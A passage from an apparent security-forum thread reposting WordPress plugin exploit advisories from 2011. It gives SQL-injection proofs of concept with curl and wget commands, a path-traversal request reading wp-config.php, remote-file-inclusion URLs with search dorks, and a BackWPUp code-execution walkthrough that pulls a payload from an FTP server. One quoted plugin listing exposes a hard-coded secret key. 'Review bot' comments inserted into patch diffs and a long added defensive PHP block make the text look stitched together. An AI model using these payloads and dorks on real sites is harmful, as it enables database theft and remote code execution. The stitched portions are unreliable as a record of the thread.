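var_dump(fetch_post_by_id($db, '3'));         // the "100% organic" row
```

    Requires PHP with the pdo_sqlite extension, which ships with most PHP builds.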
  8. p0wER
    p0wER Newbie
    Likes: 41
    WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability

    Exploit Title: WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability
    Date:
    2011-09-13
    Version: 3.8.6 (tested)

    Code:
    # Exploit Title: WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability
    # Date: 2011-09-13
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/wp-e-commerce.3.8.6.zip
    # Version: 3.8.6 (tested)
    # Note: parameter $_POST["cs3"] == md5(md5(urldecode($_POST["cs1"])))
    #       it has a "chronopay_salt" option but it's set to '' by default (see more description down below)
     
    ---------------
    PoC (POST data)
    ---------------
    http://www.site.com/?chronopay_callback=true
     cs2=chronopay&cs1=-1  AND  1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill
     
    e.g.
    #!/bin/bash
    payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
    hash=`echo -n $payload | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr -d '\n' | sed 's/\s*-\s*//g'`
    curl  --data  "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill"  http://www.site.com/?chronopay_callback=true
     
    ---------------
    Vulnerable code
    ---------------
    ./wp-e-commerce/wp-shopping-cart.php:
     
        class WP_eCommerce {
            ...
            function init() {
                ...
                $this->load();
                ...
            }
            function load() {
                ...
                wpsc_core_load_gateways();
                ...
            }
        ...
        $wpec = new WP_eCommerce();
     
     
    ./wp-e-commerce/wpsc-core/wpsc-functions.php:
     
        function wpsc_core_load_gateways() {
            global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
     
            $gateway_directory      = WPSC_FILE_PATH . '/wpsc-merchants';
            $nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
     
            $num = 0;
            foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
                if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
                    require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
                }
     
     
    ./wp-e-commerce/wpsc-merchants/chronopay.php:
     
        function nzshpcrt_chronopay_callback()
        {
            ...
            if(isset($_GET['chronopay_callback'])  && ($_GET['chronopay_callback'] == 'true') &&  ($_POST['cs2'] == 'chronopay'))
            {
                $salt = get_option('chronopay_salt'); 
                // - this is by default '' and set only if explicitly stated 
                //   inside Store Settings->Payments->General Settings->
                //   Chronopay->Edit->Security Key
                // - problem is that there are more popular payment gateways enlisted (e.g. 
                //   Google Checkout and PayPal) and if that setting is not explicitly set 
                //   it wide opens the door to the potential attacker
     
                $gen_hash = md5($salt . md5($_POST['cs1'] . $salt));    
                 
                if($gen_hash == $_POST['cs3'])
                {
                    ...
                    $sessionid = trim(stripslashes($_POST['cs1']));
                    $transaction_id = trim(stripslashes($_POST['transaction_id']));
                    $verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
                    $verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
     
                    switch($verification_data['trans_type'])
                    {
                        ...
                        case 'rebill':
                            $wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET 
                                                `processed` = '2', 
                                                `transactid` = '".$transaction_id."', 
                                                `date` = '".time()."'
                                            WHERE `sessionid` = ".$sessionid." LIMIT 1");
        ...
        add_action('init', 'nzshpcrt_chronopay_callback');
     
    14 Sep 2011
  9. Хулиган
    Хулиган Forum staff Advanced
    Likes: 242
    WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability

    # Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
    # Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
    # Date: 18-09-2011
    # Author: Septemb0x ( CYBER-WARRIOR )
    # Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
    # Version: 0.1

    POC
    Code:
     /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
    Wordpress TheCartPress Plugin 1.1.1 Remote File Inclusion


    # Exploit Title: Thecartpress Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/thecartpress
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/thecartpress/download/
    # Version: 1.1.1 (tested)

    PoC

    Code:
    http://SERVER/WP_PATH/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI
    Vulnerable Code

    Code:
    if ( isset( $_REQUEST['tcp_save_fields'] ) ) {
    $path = $_REQUEST['tcp_class_path'];
    $class_name = $_REQUEST['tcp_class_name'];
    require_once( $path );
    Wordpress AllWebMenus Plugin 1.1.3 Remote File Inclusion


    # Exploit Title: Allwebmenus Wordpress Menu Plugin Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/allwebmenus-wordpress-menu-plugin
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/download/
    # Version: 1.1.3 (tested)

    PoC
    Code:
    http://SERVER/WP_PATH/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php POST="abspath=RFI"
    Vulnerable Code
    Code:
    /** Loads the WordPress Environment and Template */
    if (!isset($_POST["abspath"]))
    die();
    require_once(urldecode((string) $_POST["abspath"].'wp-blog-header.php'));
    Wordpress WPEasyStats Plugin 1.8 Remote File Inclusion


    # Exploit Title: Wpeasystats Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/wpeasystats
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/wpeasystats/download/
    # Version: 1.8

    PoC
    ---
    Code:
    http://SERVER/WP_PATH/wp-content/plugins/wpeasystats/export.php?homep=RFI
    Vulnerable Code

    Code:
    $core = $_GET['homep'].'wp-load.php';
    include( $core );
    Wordpress Annonces Plugin 1.2.0.0 Remote File Inclusion


    # Exploit Title: Annonces Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/annonces
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/annonces/download/
    # Version: 1.2.0.0 (tested)

    PoC

    Code:
    http://SERVER/WP_PATH/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=RFI
    Vulnerable Code

    Code:
    require_once($_GET['abspath'] . 'wp-load.php');
    Wordpress Livesig Plugin 0.4 Remote File Inclusion


    # Exploit Title: Livesig Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/livesig
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/livesig/download/
    # Version: 0.4 (tested)

    PoC

    Code:
    http://SERVER/WP_PATH/wp-content/plugins/livesig/livesig-ajax-backend.php POST="wp-root=RFI&action=asdf"
    Vulnerable Code

    Code:
    // Exit if no function specified
    if( !isset( $_POST['action'] ) || '' == $_POST['action'] ) {
    echo '{ errcode: "ERR-000", errmsg: "No action specified" }';
    exit();
    }
    
    include( $_POST['wp-root'] . 'wp-config.php' );

    Wordpress Disclosure Policy Plugin 1.0 Remote File Inclusion


    # Exploit Title: Disclosure Policy Plugin Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/disclosure-policy-plugin
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/disclosure-policy-plugin/download/
    # Version: 1.0 (tested)

    PoC

    Code:
    http://SERVER/WP_PATH/wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=RFI
    Vulnerable Code

    Code:
    if(isset($_GET['delete']))
    {
    global $wpdb, $wp_rewrite, $allowedtags, $user_ID;
    $table_prefix1 = "dpp_";
    
    $tags_ID = (int) $_GET['id'];
    $abspath = $_GET['abspath'];
    $blogUrl = $_GET['blog_url'];
    require_once($abspath . '/wp-config.php')
    Wordpress Mailing List Plugin 1.3.2 Remote File Inclusion


    # Exploit Title: Mailing List Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/mailz
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/mailz/download/
    # Version: 1.3.2 (tested)

    PoC

    Code:
    http://SERVER/WP_PATH/wp-content/plugins/mailz/lists/config/config.php?wpabspath=RFI
    Vulnerable Code
    Code:
    if ( isset($_GET['wpabspath']) ) {
    //zingiri
    //error_reporting(E_ALL & ~E_NOTICE);
    //ini_set('display_errors', '1');
    define('ABSPATH', dirname(__FILE__) . '/');
    require($_GET['wpabspath'].'wp-config.php');
    
    Wordpress Zingiri Web Shop Plugin 2.2.0 Remote File Inclusion


    # Exploit Title: Zingiri Web Shop Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/zingiri-web-shop
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/zingiri-web-shop/download/
    # Version: 2.2.0 (tested)

    PoC

    Code:
    http://SERVER/WP_PATH/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=RFI OR /fwkfor/ajax/init.inc.php?wpabspath=RFI
    Vulnerable Code

    Code:
    if ($_REQUEST['cms']=='jl') {
    define('ZING_CMS','jl');
    $_REQUEST['tmpl'] = 'component';
    $_REQUEST['option'] = 'com_zingiriwebshop';
    ob_start();
    require($_REQUEST['wpabspath'].'/index.php');
    ob_end_clean();
    } elseif ($_REQUEST['cms']=='dp') {
    //all bootstrapping is already done
    } else {
    if (!defined('ZING_AJAX') || !ZING_AJAX) {
    /** Loads the WordPress Environment */
    //require($_REQUEST['wpabspath'].'wp-blog-header.php');
    require($_REQUEST['wpabspath'].'wp-load.php');
    /** Load Zingiri Web Shop */
    require(dirname(__FILE__).'/../../zing.readcookie.inc.php');
    require(dirname(__FILE__).'/../../startmodules.inc.php');
    }
    }
    Wordpress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion


    # Exploit Title: Mini Mail Dashboard Widget Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
    # Version: 1.36 (tested)

    PoC

    Code:
    http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)
    Vulnerable Code

    Code:
    if (isset($_FILES['wpmm-upload'])) {
    // Create WordPress environmnt
    require_once(urldecode($_REQUEST['abspath']) . 'wp-load.php');
    
    // Handle attachment
    WPMiniMail::wpmm_upload();
    }
    Wordpress Relocate Upload Plugin 0.14 Remote File Inclusion

    # Exploit Title: Relocate Upload Wordpress plugin RFI
    # Google Dork: inurl:wp-content/plugins/relocate-upload
    # Date: 09/19/2011
    # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
    # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
    # Version: 0.14 (tested)

    PoC

    Code:
    http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
    Vulnerable Code

    Code:
    // Move folder request handled when called by GET AJAX
    if (isset($_GET['ru_folder']))
    { // WP setup and function access
    define('WP_USE_THEMES', false);
    require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter
    (c) bugsearch
     
    20 Sep 2011
  10. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    WordPress CevherShare Plugin 2.0 SQL Injection


    • => WordPress CevherShare 2.0 plugin SQL Injection Vulnerability
    • => Bugfounder: bd0rk
    • => Contact: bd0rk[at]hackermail.com
    • => Greetings: Perle, Martin K., Carsten R., x0r_32
    • => Affected-Software: WordPress CevherShare 2.0 plugin
    • => Vendor: http://phpkode.com/
    • => Download: http://phpkode.com/download/s/cevhershare.zip
    • => Tested on: Ubuntu-Linux

    Vulnerable C0de in cevhershare/cevhershare-admin.php

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

    PoC: http://[someone]/wp-content/plugins/cevhershare/cevhershare-admin.php?id=[SQL-Injection]


    Code:
    $id = $_GET['id'] ? $_GET['id'] : $_POST['id'];
    $pos = $_GET['pos'] ? $_GET['pos'] : $_POST['pos'];
    $status = $_GET['status'] ? $_GET['status'] : $_POST['status'];
    $task = $_GET['t'] ? $_GET['t'] : $_POST['t'];
    $do = $_POST['do'];
    if($do == "update-lang"){
        $uplang = $_POST['update-lang'];
        update_option('cevhershare_language',$uplang);
    }
    if($id) $item = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."cevhershare WHERE id=$id");
    if($do == 'update') $wpdb->query("UPDATE ".$wpdb->prefix."cevhershare SET enabled='".$_POST['enabled']."', position='".$_POST['position']."', name='".$_POST['name']."', big='".$_POST['big']."', small='".$_POST['small']."' WHERE id='$id'");
    elseif($do == 'add') $wpdb->query("INSERT INTO ".$wpdb->prefix."cevhershare (position, name, big, small) VALUES('".$_POST['position']."','".$_POST['name']."', '".$_POST['big']."', '".$_POST['small']."')");
    elseif($do == 'delete') $wpdb->query("DELETE FROM ".$wpdb->prefix."cevhershare WHERE id=$id LIMIT 1");
    elseif($do == 'reset') cevhershare_reset();
    elseif($do == 'settings'){
    source: exploit-db.com
    [+] off-topic
    I got it mixed up :-[
     
    Last edited: 26 Sep 2011
    26 Sep 2011
    1 person likes this.
  11. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability

    # Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
    # Version: 2.8.7 (tested)


    PoC (POST data)

    Code:
    http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
    limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
    Code:
    curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
    Vulnerable code

    Code:
    if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) - 1) * $limit;
    
    foreach($_POST["item"] as $key => $value){
    $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
    $result = mysql_query($sql);
    }
    }
     
    2 Oct 2011
    1 person likes this.
  12. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    Exploit Title: WordPress GD Star Rating plugin <= 1.9.10 SQL Injection Vulnerability


    PoC

    Code:
    http://www.site.com/wp-content/plugins/gd-star-rating/export.php?ex=user&us=dummy&de=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
    Vulnerable code

    Code:
    ./export.php
        require_once("./code/cls/export.php");
        ...
        if (isset($_GET["ex"])) {
            $export_type = $_GET["ex"];
            ...
            switch($export_type) {
                case "user":
                    header('Content-type: text/csv');
                    header('Content-Disposition: attachment; filename="gdsr_export_'.$export_name.'.csv"');
                    $sql = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_data);
                    $rows = $wpdb->get_results($sql, ARRAY_N);
     
    ./code/cls/export.php
        class GDSRExport {
            ...
            function export_users($user_data = "min", $data_export = "article", $get_data = array()) {
                ...
                $where = array();
                ...
                $where[] = "v.vote_type = '".$data_export."'";
                ...
                $j_where = join(" and ", $where);
                ...
                return sprintf("select %s from %s where %s order by u.id",
                        $j_select, $j_tables, $j_where);
     
    13 Oct 2011
    2 users liked this.
  13. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    WordPress Contact Form plugin <= 2.7.5 SQL Injection


    # Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
    # Date: 2011-10-13
    # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
    # Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
    # Version: 2.7.5 (tested)


    PoC (POST data)

    Code:
    http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php 
    wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
    e.g.
    Code:
    curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1

    Vulnerable code

    Line 49:
    Code:
    public function the_content($content) {
    global $wpdb;
    global $table_name;
    global $settings_table_name;
    
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    
    $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

    Patch

    Code:
    *** ./easy-form.class.php.orig	2011-10-13 19:53:05.674800956 -0400
    --- ./easy-form.class.php	2011-10-13 19:51:21.442799615 -0400
    ***************
    *** 54,61 ****
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    ! 
    ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
    
    $continue = true;
    
    --- 54,63 ----
    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
    
    if ($_POST['wpcf_easyform_submitted'] == 1) {
    ! $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
    ! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); 
    ! 
    ! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
    
    $continue = true;
    
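    Review bot: the replacement line `! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);` does not sanitise the form id at all; it only removes the first two characters of the POSTed value and the remainder is still concatenated into `SELECT * FROM $table_name WHERE ID = ` exactly as before, so any value longer than two characters reaches the query unchanged and the injection this patch is meant to close remains. Replace the substr() with an integer cast, e.g. `$wpcf_easyform_formid = intval($_POST['wpcf_easyform_formid']);`, or better `$wpdb->prepare("SELECT * FROM $table_name WHERE ID = %d", $wpcf_easyform_formid)`. Separately, the unchanged context line `$private_key = '6LdKkr8S...'` is a reCAPTCHA secret hard-coded in source and belongs in configuration, not in the class file.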
    ***************
    *** 71,80 ****
    if ($continue) {
    
    //loop through the fields of this form (read from DB) and build the message here
    ! $form_fields = $wpdb->get_results("
    SELECT *
    FROM $settings_table_name
    ! WHERE form_id = ".$_POST['wpcf_easyform_formid']."
    ORDER BY position
    ");
    
    --- 73,82 ----
    if ($continue) {
    
    //loop through the fields of this form (read from DB) and build the message here
    ! $form_fields = $wpdb->get_results("
    SELECT *
    FROM $settings_table_name
    ! WHERE form_id = ".$wpcf_easyform_formid."
    ORDER BY position
    ");[
     
    Last edited: 15 Oct 2011
    15 Oct 2011
    1 person likes this.
  14. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability


    # Exploit Title: WP Photo Album Plus <= 4.1.1 SQL Injection Vulnerability
    # Date: 2011-10-14
    # Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
    # Plugin Page: http://wordpress.org/extend/plugins/wp-photo-album-plus/
    # Software Link: http://downloads.wordpress.org/plugin/wp-photo-album-plus.zip
    # Version: 4.1.1 (tested)

    PoC (GET data)

    Code:
    http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1
    wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1 
    e.g.

    Code:
    wget "http://127.0.0.1/wordpress/?page_id=7&wppa-album=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)&wppa-cover=0&wppa-occur=1"
    Vulnerable code

    Code:
    Line 76 of wppa-functions.php:
    if ( $this_occur ) $alb = wppa_get_get('album');
    if ( ! $alb && is_numeric($wppa['start_album']) ) $alb = $wppa['start_album'];
    
    $separate = wppa_is_separate($alb);
    
    $slide = ( wppa_get_album_title_linktype($alb) == 'slide' ) ? '&wppa-slide' : '';
    
    
    Line 3170 of wppa-functions.php:
    function wppa_get_get($index, $default = false) {
    #xdebug_start_trace('/var/www/xdebug.log');
    if (isset($_GET['wppa-'.$index])) { // New syntax first
    return $_GET['wppa-'.$index];
    }
    if (isset($_GET[$index])) { // Old syntax
    return $_GET[$index];
    }
    return $default;
    }
    
    Line 3362 of wppa-functions.php:
    function wppa_get_album_title_linktype($alb) {
    global $wpdb;
    if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
    else $result = '';
    echo $result;
    return $result;
    }
    Patch

    Code:
    *** ./wppa-functions.php	2011-10-03 09:37:48.000000000 -0400
    --- ./wppa-functions.php.new	2011-10-15 16:02:27.996945496 -0400
    ***************
    *** 3361,3367 ****
    
    function wppa_get_album_title_linktype($alb) {
    global $wpdb;
    ! 
    if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
    else $result = '';
    //echo $result;
    --- 3361,3367 ----
    
    function wppa_get_album_title_linktype($alb) {
    global $wpdb;
    ! $alb=intval($alb);
    if ( $alb ) $result = $wpdb->get_var("SELECT cover_linktype FROM ".WPPA_ALBUMS." WHERE id = ".$alb." LIMIT 1");
    else $result = '';
    //echo $result;
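    Review bot: `! $alb=intval($alb);` closes the injection inside wppa_get_album_title_linktype(), but the raw value from `wppa_get_get('album')` is also passed to `wppa_is_separate($alb)` in the caller shown in the vulnerable listing above (line 76 of wppa-functions.php), which this patch does not touch. Cast once at the source, e.g. `$alb = intval(wppa_get_get('album'));` in the caller, so every consumer receives an integer rather than relying on each function to cast. Note also that the old side of this hunk has `//echo $result;` while the vulnerable listing above shows `echo $result;` live, so the patch base already differs from the listed 4.1.1 code.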
    ***************
    *** 3384,3387 ****
    global $wppa;
    
    if ( $wppa['any'] ) echo $wppa['searchresults'];
    ! }
    \ No newline at end of file
    --- 3384,3387 ----
    global $wppa;
    
    if ( $wppa['any'] ) echo $wppa['searchresults'];
    ! }
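    Review bot: this hunk changes nothing but the missing trailing newline after the final `}` (the `\ No newline at end of file` marker); it is whitespace-only and unrelated to the SQL fix, so either drop it from the patch or say so in the description, otherwise readers will look for a second code change here.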

    WordPress BackWPUp Plugin 2.1.4 Code Execution


    Proof of Concept.

    Code:
    Upload the following to a publicly accessible FTP server and
    name it "file.txt.running".
    
    a:2:{s:7:"WORKING";a:1:{s:5:"NONCE";s:3:"123";}s:8:"ABS_PATH";s:25:
    "data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=";}
    
    This serialised string creates an array containing:
    
    $infile['WORKING'] = array();
    $infile['WORKING']['NONCE'] = '123';
    $infile['ABS_PATH'] = 
    'data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=';
    
    Once uploaded ensure the FTP file is writeable and issue a POST to
    "job/wp_export_generate.php" with the following parameters:
    
    $_POST['BackWPupJobTemp'] = "ftp://user:password@10.2.0.128/file.txt";
    $_POST['nonce'] = '123';
    $_POST['type'] = 'getxmlexport';
    
    The string included in $infile['ABS_PATH'] will then have "wp-load.php"
    appended to it and passed to require_once.
    
    In the above example the code contained in the base64 encoded string will
    then be executed. The above code executes "phpinfo(); die();".
    allow_url_include will need to be on to allow for remote file
    inclusion, however local file inclusion could easily be achieved by using
    null byte injection.
    
    Solution.
    =========
    Upgrade to BackWPUp 2.1.5 or above.
    
    Discovered by.
    Phil Taylor from Sense of Security Labs.
    
    About us.
    Sense of Security is a leading provider of information security and risk
    management solutions. Our team has expert skills in assessment and
    assurance, strategy and architecture, and deployment through to ongoing management.
    We are Australia's premier application penetration testing firm and trusted
    IT security advisor to many of the country's largest organisations.
    
    Sense of Security Pty Ltd
    Level 8, 66 King St
    Sydney NSW 2000
    AUSTRALIA
    
    T: +61 (0)2 9290 4444
    F: +61 (0)2 9290 4455
    W: http://www.senseofsecurity.com.au
    E: info@senseofsecurity.com.au
    Twitter: @ITsecurityAU
    
    The latest version of this advisory can be found at:
    http://www.senseofsecurity.com.au/advisories/SOS-11-012.pdf
    
    Other Sense of Security advisories can be found at:
    http://www.senseofsecurity.com.au/research/it-security-advisories.php 
     
    18 Oct 2011
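The remote file inclusion entries earlier in this thread and the BackWPUp advisory above come down to the same thing: `require_once` on a path that the request (or a file the attacker controls) supplies, including stream-wrapper URLs such as `data://`. As an added example, not code from any of those plugins or advisories, the block below shows a plugin entry point locating wp-load.php from its own position on disk and a guard that refuses wrapper URLs, NUL bytes and paths outside the site root; the temporary directory tree it builds is constructed for the demonstration.

```php
<?php
// Added example, not code from any plugin or advisory quoted in this thread.
// The vulnerable pattern in the advisories is, in each case, a variant of
//     require_once($_GET['abspath'] . 'wp-load.php');
// i.e. the caller of the page chooses what gets included. A plugin that is
// invoked directly (AJAX endpoint, download script) does not need that:
// wp-load.php is always an ancestor of the plugin's own directory.
declare(strict_types=1);

/**
 * Walk upward from $start until a directory containing wp-load.php is found.
 * Bounded by $max_depth; never consults request data.
 */
function locate_wp_load(string $start, int $max_depth = 10): ?string
{
    $dir = realpath($start);
    if ($dir === false) {
        return null;
    }
    for ($i = 0; $i <= $max_depth; $i++) {
        $candidate = $dir . DIRECTORY_SEPARATOR . 'wp-load.php';
        if (is_file($candidate)) {
            return $candidate;
        }
        $parent = dirname($dir);
        if ($parent === $dir) {          // reached the filesystem root
            break;
        }
        $dir = $parent;
    }
    return null;
}

/**
 * Guard for any path that must stay a local file under $base: rejects stream
 * wrappers (http://, ftp://, data://, php://, ...), NUL bytes, non-existent
 * paths and anything that resolves outside $base. Returns the canonical
 * path, or null when the value must not be used.
 */
function safe_local_path(string $path, string $base): ?string
{
    if (strpos($path, "\0") !== false || preg_match('#^[a-z][a-z0-9+.-]*://#i', $path)) {
        return null;
    }
    $real = realpath($path);
    $base = realpath($base);
    if ($real === false || $base === false) {
        return null;
    }
    // $real must be $base itself or a descendant of it.
    return ($real === $base || strpos($real, $base . DIRECTORY_SEPARATOR) === 0) ? $real : null;
}

// Usage inside a plugin entry point would be:
//     $wp_load = locate_wp_load(__DIR__);
//     if ($wp_load === null) { http_response_code(500); exit; }
//     require_once $wp_load;

// --- stand-alone demonstration on a constructed directory tree --------------
$root = sys_get_temp_dir() . '/wp_demo_' . uniqid();
mkdir("$root/wp-content/plugins/demo", 0700, true);
file_put_contents("$root/wp-load.php", "<?php // constructed stand-in for WordPress\n");

$found = locate_wp_load("$root/wp-content/plugins/demo");
printf("wp-load.php located at: %s\n", $found ?? 'not found');

$samples = [
    'http://example.invalid/',                // remote wrapper: rejected
    'data://text/plain;base64,AAAA',          // data wrapper (BackWPUp case): rejected
    "$root/wp-content/../wp-content",         // inside the tree: accepted
    '/etc',                                   // outside the tree: rejected
];
foreach ($samples as $p) {
    printf("%-40s -> %s\n", $p, safe_local_path($p, $root) ?? 'rejected');
}

// cleanup of the constructed tree
unlink("$root/wp-load.php");
rmdir("$root/wp-content/plugins/demo");
rmdir("$root/wp-content/plugins");
rmdir("$root/wp-content");
rmdir($root);
```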
  15. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    242
    WordPress wptouch plugin SQL Injection Vulnerability

    • # Exploit Title: WordPress wptouch plugin SQL Injection Vulnerability
    • # Date: 2011-27-10
    • # Author: longrifle0x
    • # software: Wordpress
    • # Tools: SQLMAP

    (POST data)

    Code:
    http://www.site.com/wp-content/plugins/wptouch/ajax.php
    
    #Exploit: id=-1; id=- AND SLEEP(5) or 1=if
    
    http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER()
    
    http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT
    (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
    0,1)='Y') THEN 1 ELSE 0 END)
    
